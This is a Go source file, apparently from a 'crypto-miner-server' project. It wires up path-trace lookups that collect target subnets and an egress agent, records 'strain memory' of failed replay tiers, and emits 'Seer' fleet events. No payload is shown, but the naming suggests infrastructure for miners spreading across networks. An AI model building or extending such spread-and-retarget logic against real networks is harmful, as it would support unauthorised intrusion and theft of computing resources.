Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Prosecutor and Public Defender use real fleet telemetry only; Judge dispatches L4 commands and emits full transcripts via seer_events and emberwake_court_debate when ai_control_enabled.
151 lines
3.8 KiB
Go
151 lines
3.8 KiB
Go
package api
|
|
|
|
import (
|
|
"encoding/json"
|
|
"strings"
|
|
|
|
fleetai "crypto-miner-server/internal/ai"
|
|
"crypto-miner-server/internal/spreadrouter"
|
|
)
|
|
|
|
// PathTraceSurgicalAdapter resolves persisted Path Tracer sessions for surgical replay.
|
|
type PathTraceSurgicalAdapter struct {
|
|
Hub *WSHub
|
|
PathTrace *PathTracerHandler
|
|
}
|
|
|
|
func (a *PathTraceSurgicalAdapter) TraceForAgent(agentID string) (fleetai.SurgicalTraceContext, bool) {
|
|
if a == nil || agentID == "" {
|
|
return fleetai.SurgicalTraceContext{}, false
|
|
}
|
|
sessions := traceSessionsSnapshot(a.PathTrace)
|
|
if len(sessions) == 0 && a.Hub != nil && a.Hub.db != nil {
|
|
rows, err := a.Hub.db.ListPathTraceSessions()
|
|
if err != nil {
|
|
return fleetai.SurgicalTraceContext{}, false
|
|
}
|
|
for _, row := range rows {
|
|
var rec pathTraceSessionPersist
|
|
if json.Unmarshal(row.Payload, &rec) != nil {
|
|
continue
|
|
}
|
|
sess := &TraceSession{
|
|
ID: rec.ID, AgentIDs: rec.AgentIDs, Hops: rec.Hops,
|
|
Error: rec.Error, DiscoverError: rec.DiscoverError,
|
|
}
|
|
sessions = append(sessions, sess)
|
|
}
|
|
}
|
|
for _, sess := range sessions {
|
|
if ctx, ok := surgicalTraceFromSession(sess, agentID); ok {
|
|
return ctx, true
|
|
}
|
|
}
|
|
return fleetai.SurgicalTraceContext{}, false
|
|
}
|
|
|
|
func surgicalTraceFromSession(sess *TraceSession, agentID string) (fleetai.SurgicalTraceContext, bool) {
|
|
if sess == nil || agentID == "" {
|
|
return fleetai.SurgicalTraceContext{}, false
|
|
}
|
|
hopIndex := -1
|
|
for i, hop := range sess.Hops {
|
|
if hop != nil && hop.AgentID == agentID {
|
|
hopIndex = i
|
|
break
|
|
}
|
|
}
|
|
if hopIndex < 0 {
|
|
for _, id := range sess.AgentIDs {
|
|
if id == agentID {
|
|
hopIndex = 0
|
|
break
|
|
}
|
|
}
|
|
}
|
|
if hopIndex < 0 {
|
|
return fleetai.SurgicalTraceContext{}, false
|
|
}
|
|
ctx := fleetai.SurgicalTraceContext{
|
|
SessionID: sess.ID,
|
|
HopIndex: hopIndex,
|
|
HopCount: len(sess.Hops),
|
|
SessionError: strings.TrimSpace(sess.Error),
|
|
DiscoverError: strings.TrimSpace(sess.DiscoverError),
|
|
}
|
|
if len(sess.Hops) > 0 {
|
|
last := sess.Hops[len(sess.Hops)-1]
|
|
if last != nil {
|
|
ctx.EgressAgentID = last.AgentID
|
|
}
|
|
}
|
|
for _, host := range serviceGraphList(sess.ServiceGraph) {
|
|
sub := spreadrouter.NormalizeSubnet(host.Subnet)
|
|
if sub == "" {
|
|
sub = spreadrouter.SubnetFromIP(host.Host)
|
|
}
|
|
if sub != "" {
|
|
ctx.TargetSubnets = append(ctx.TargetSubnets, sub)
|
|
}
|
|
}
|
|
return ctx, true
|
|
}
|
|
|
|
// DatabaseStrainMemoryAdapter persists surgical replay outcomes.
|
|
type DatabaseStrainMemoryAdapter struct {
|
|
DB interface {
|
|
InsertStrainMemory(agentID, sessionID, failedTier, strain, fixType, fixArgs, outcome string) error
|
|
}
|
|
}
|
|
|
|
func (a *DatabaseStrainMemoryAdapter) InsertStrainMemory(agentID, sessionID, failedTier, strain, fixType, fixArgs, outcome string) error {
|
|
if a == nil || a.DB == nil {
|
|
return nil
|
|
}
|
|
return a.DB.InsertStrainMemory(agentID, sessionID, failedTier, strain, fixType, fixArgs, outcome)
|
|
}
|
|
|
|
// HubSeerEmitter broadcasts and persists Seer feed events.
|
|
type HubSeerEmitter struct {
|
|
Hub *WSHub
|
|
DB interface {
|
|
InsertSeerEvent(eventType, agentID string, payload []byte) (int64, error)
|
|
}
|
|
}
|
|
|
|
func (e *HubSeerEmitter) EmitSeerEvent(eventType, agentID string, payload map[string]interface{}) error {
|
|
if e == nil {
|
|
return nil
|
|
}
|
|
raw, _ := json.Marshal(payload)
|
|
var id int64
|
|
if e.DB != nil {
|
|
var err error
|
|
id, err = e.DB.InsertSeerEvent(eventType, agentID, raw)
|
|
if err != nil {
|
|
return err
|
|
}
|
|
}
|
|
if e.Hub != nil {
|
|
e.Hub.BroadcastSeerEvent(map[string]interface{}{
|
|
"id": id,
|
|
"event_type": eventType,
|
|
"agent_id": agentID,
|
|
"payload": json.RawMessage(raw),
|
|
})
|
|
}
|
|
return nil
|
|
}
|
|
|
|
// StrainFromAgent returns spread_strain for strain memory rows.
|
|
func StrainFromAgent(hub *WSHub, agentID string) string {
|
|
if hub == nil || hub.db == nil || agentID == "" {
|
|
return ""
|
|
}
|
|
ag, err := hub.db.GetAgent(agentID)
|
|
if err != nil || ag == nil {
|
|
return ""
|
|
}
|
|
return strings.TrimSpace(ag.SpreadStrain)
|
|
}
|